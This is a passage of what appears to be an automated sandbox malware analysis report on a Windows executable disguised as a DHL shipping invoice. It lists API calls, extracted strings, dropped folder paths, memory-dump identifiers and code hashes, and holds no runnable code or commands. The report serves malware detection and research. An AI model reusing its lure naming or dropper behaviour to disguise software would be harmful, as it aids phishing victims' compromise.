                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2B228A71D0020ADBDB159FACC9867EEB7F5FB08305F24652FD1A6E3288D7749A818B50
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CoCreateInstance.OLE32(004085F0,?,00000001,004085E0,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402183
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Livmoderens15\Skuespilforfatternes, xrefs: 004021C3
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000002.00000002.423396785019.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396758425.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396814335.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000450000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423397113724.0000000000453000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CreateInstance
                                                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Livmoderens15\Skuespilforfatternes
                                                                                                                                                                                                                                      • API String ID: 542301482-978686151
                                                                                                                                                                                                                                      • Opcode ID: c79f9aaaf2aa45103f2785abe1c238f1ff8b7e426493679be1bb18482ad01322
                                                                                                                                                                                                                                      • Instruction ID: 47658dbbd12ee8008517b47355d5d9d52026a5fb35fba2bce99957a22e6c3eef
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c79f9aaaf2aa45103f2785abe1c238f1ff8b7e426493679be1bb18482ad01322
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8B414C71A00208AFCF04DFE4C988A9D7BB5FF48314B24457AF915EB2E0DBB99981CB44
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000002.00000002.423396785019.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396758425.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396814335.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000450000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423397113724.0000000000453000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: p!C$p!C
                                                                                                                                                                                                                                      • API String ID: 0-3125587631
                                                                                                                                                                                                                                      • Opcode ID: b391703ce6aa9d184f83615265780e2503839b4fa6daee6685a5ac04655da8ea
                                                                                                                                                                                                                                      • Instruction ID: 7c26ffe8835462b5285d43e9ad3b72979f058f3642fe5300250d3649f4ae0bba
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b391703ce6aa9d184f83615265780e2503839b4fa6daee6685a5ac04655da8ea
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9BC15831E04219DBDF18CF68C8905EEBBB2BF88314F25866AC85677380D734A942CF95
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • VirtualFree.KERNEL32(?,00000000,?), ref: 73A416C5
                                                                                                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 73A416CC
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000002.00000002.423415300742.0000000073A41000.00000020.00000001.01000000.00000006.sdmp, Offset: 73A40000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423415272754.0000000073A40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423415327749.0000000073A44000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423415355677.0000000073A46000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_73a40000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Free$GlobalVirtual
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3500604073-0
                                                                                                                                                                                                                                      • Opcode ID: 7c40519e6ff56c0366f4e3d7f2014a26576bda2000ebc3fdd0f0d280b837af8e
                                                                                                                                                                                                                                      • Instruction ID: ba99bca97f85c56e840adac04d26bc3c2352a1507a86f291f68254bbd28659ca
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7c40519e6ff56c0366f4e3d7f2014a26576bda2000ebc3fdd0f0d280b837af8e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A1F04F75614210CFCB44DF6EC516B15B7F4FB88650B2C802FA80AC7298E77AD402CF90
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402877
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000002.00000002.423396785019.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396758425.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396814335.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000450000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423397113724.0000000000453000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FileFindFirst
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1974802433-0
                                                                                                                                                                                                                                      • Opcode ID: d976f7a25d9b6cda02430a9c4c43dcf534a7d9685ff1e4a5993e34d41637e130
                                                                                                                                                                                                                                      • Instruction ID: 0cd4a400be5c1b2ce6ea5bbb35e8853c3f48bcc8ff45a2cab7902aaadd26400c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d976f7a25d9b6cda02430a9c4c43dcf534a7d9685ff1e4a5993e34d41637e130
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C8F08271A14104EFDB00EBA4DA499ADB378EF04314F6045BBF515F21D1DBB45D409B29
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000002.00000002.423396785019.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396758425.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396814335.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000450000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423397113724.0000000000453000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 9639f9c0007cb4c124acbb6985d7f6f1a05031d6bc3fffd11e08744ca1378656
                                                                                                                                                                                                                                      • Instruction ID: 703def0becceeecb9d8561ea32c53bcab4b84ebc773a8a1d0b412cad538f794c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9639f9c0007cb4c124acbb6985d7f6f1a05031d6bc3fffd11e08744ca1378656
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1EE1797190470ADFDB24CF99C880BAAB7F5FF44305F15852EE497A7291E378AA91CB04
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403D94
                                                                                                                                                                                                                                      • ShowWindow.USER32(?), ref: 00403DB1
                                                                                                                                                                                                                                      • DestroyWindow.USER32 ref: 00403DC5
                                                                                                                                                                                                                                      • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403DE1
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,?), ref: 00403E02
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403E16
                                                                                                                                                                                                                                      • IsWindowEnabled.USER32(00000000), ref: 00403E1D
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,00000001), ref: 00403ECB
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,00000002), ref: 00403ED5
                                                                                                                                                                                                                                      • SetClassLongW.USER32(?,000000F2,?), ref: 00403EEF
                                                                                                                                                                                                                                      • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403F40
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,00000003), ref: 00403FE6
                                                                                                                                                                                                                                      • ShowWindow.USER32(00000000,?), ref: 00404007
                                                                                                                                                                                                                                      • EnableWindow.USER32(?,?), ref: 00404019
                                                                                                                                                                                                                                      • EnableWindow.USER32(?,?), ref: 00404034
                                                                                                                                                                                                                                      • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040404A
                                                                                                                                                                                                                                      • EnableMenuItem.USER32(00000000), ref: 00404051
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404069
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040407C
                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(0042D248,?,0042D248,00000000), ref: 004040A6
                                                                                                                                                                                                                                      • SetWindowTextW.USER32(?,0042D248), ref: 004040BA
                                                                                                                                                                                                                                      • ShowWindow.USER32(?,0000000A), ref: 004041EE
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000002.00000002.423396785019.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396758425.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396814335.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000450000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423397113724.0000000000453000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 184305955-0
                                                                                                                                                                                                                                      • Opcode ID: 7123d0eaadf85c37b7798e08e10b1c5fe4a9df0faa1dcc76925985b39ebaeda9
                                                                                                                                                                                                                                      • Instruction ID: e03fc219ec92158800d4d40d681534e4389e9639ccb8e5563fa4604b390d03ca
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7123d0eaadf85c37b7798e08e10b1c5fe4a9df0faa1dcc76925985b39ebaeda9
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 29C1D171600300ABDB216F61ED89E2B3AB8FB95746F04053EF641B51F0CB799982DB6D
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040448E
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003E8), ref: 004044A2
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004044BF
                                                                                                                                                                                                                                      • GetSysColor.USER32(?), ref: 004044D0
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004044DE
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004044EC
                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?), ref: 004044F1
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004044FE
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404513
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,0000040A), ref: 0040456C
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000), ref: 00404573
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003E8), ref: 0040459E
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004045E1
                                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F02), ref: 004045EF
                                                                                                                                                                                                                                      • SetCursor.USER32(00000000), ref: 004045F2
                                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 0040460B
                                                                                                                                                                                                                                      • SetCursor.USER32(00000000), ref: 0040460E
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040463D
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 0040464F
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000002.00000002.423396785019.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396758425.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396814335.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000450000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423397113724.0000000000453000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                                                                                                                                                                      • String ID: Call$N$gC@
                                                                                                                                                                                                                                      • API String ID: 3103080414-2733886405
                                                                                                                                                                                                                                      • Opcode ID: 353f568027e9435f0b10a007412a0fb7b671a4650aedb506db2b7bc5b58b0be6
                                                                                                                                                                                                                                      • Instruction ID: 67960cbe9d5dd80a83daf25f2437327cccbb0fafcef4e9f4d39b28ee92a42e65
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 353f568027e9435f0b10a007412a0fb7b671a4650aedb506db2b7bc5b58b0be6
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: ED618FB1900209BFDB109F60DD85EAA7B79FB84345F00853AF605B62D0D77DA951CFA8
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                                                                                                                      • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                                                                                                                      • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                                                                                                                                      • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                                                                                                                                      • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                                                                                                                                                      • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                                                                                                                                      • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                                                                                                                                      • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                                                                                                                                      • DrawTextW.USER32(00000000,00433EE0,000000FF,00000010,00000820), ref: 00401156
                                                                                                                                                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                                                                                                                                      • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000002.00000002.423396785019.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396758425.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396814335.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000450000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423397113724.0000000000453000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                                                                                                                      • String ID: F
                                                                                                                                                                                                                                      • API String ID: 941294808-1304234792
                                                                                                                                                                                                                                      • Opcode ID: e215112caf94b1f54c3d659d29471f2010c28c8ad64a223ce82802b434a3cd12
                                                                                                                                                                                                                                      • Instruction ID: 68187ad06c86d7515f13608b457f8be07a0117cb3bcf177897c910b083aea3f1
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e215112caf94b1f54c3d659d29471f2010c28c8ad64a223ce82802b434a3cd12
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9A418C71800209AFCF058F95DE459AF7BB9FF44315F00842AF591AA1A0C778EA54DFA4
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,004060A1,?,?), ref: 00405F41
                                                                                                                                                                                                                                      • GetShortPathNameW.KERNEL32(?,004308E8,00000400), ref: 00405F4A
                                                                                                                                                                                                                                        • Part of subcall function 00405D15: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FFA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D25
                                                                                                                                                                                                                                        • Part of subcall function 00405D15: lstrlenA.KERNEL32(00000000,?,00000000,00405FFA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D57
                                                                                                                                                                                                                                      • GetShortPathNameW.KERNEL32(?,004310E8,00000400), ref: 00405F67
                                                                                                                                                                                                                                      • wsprintfA.USER32 ref: 00405F85
                                                                                                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,004310E8,C0000000,00000004,004310E8,?,?,?,?,?), ref: 00405FC0
                                                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405FCF
                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406007
                                                                                                                                                                                                                                      • SetFilePointer.KERNEL32(0040A560,00000000,00000000,00000000,00000000,004304E8,00000000,-0000000A,0040A560,00000000,[Rename],00000000,00000000,00000000), ref: 0040605D
                                                                                                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 0040606E
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00406075
                                                                                                                                                                                                                                        • Part of subcall function 00405DB0: GetFileAttributesW.KERNELBASE(?,00402F1D,C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405DB4
                                                                                                                                                                                                                                        • Part of subcall function 00405DB0: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DD6
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000002.00000002.423396785019.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396758425.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396814335.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000450000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423397113724.0000000000453000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                                                                                                                                                                      • String ID: %ls=%ls$[Rename]
                                                                                                                                                                                                                                      • API String ID: 2171350718-461813615
                                                                                                                                                                                                                                      • Opcode ID: 19ce75182fe0bcfe9ef27c5950cf2d0ac50ba1a4511b366fbaff45796f309885
                                                                                                                                                                                                                                      • Instruction ID: 4536b0422d5dde00314373cba87b6dc9e05edcb010d47b65b9eea0f1bfd6f862
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 19ce75182fe0bcfe9ef27c5950cf2d0ac50ba1a4511b366fbaff45796f309885
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5A313531641B04BBC220AB659D48F6B3AACEF45744F15003FFA46F62D2DB7C98118ABD
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe",0040336A,C:\Users\user\AppData\Local\Temp\,757C3420,004035D9,?,00000006,00000008,0000000A), ref: 004065B1
                                                                                                                                                                                                                                      • CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004065C0
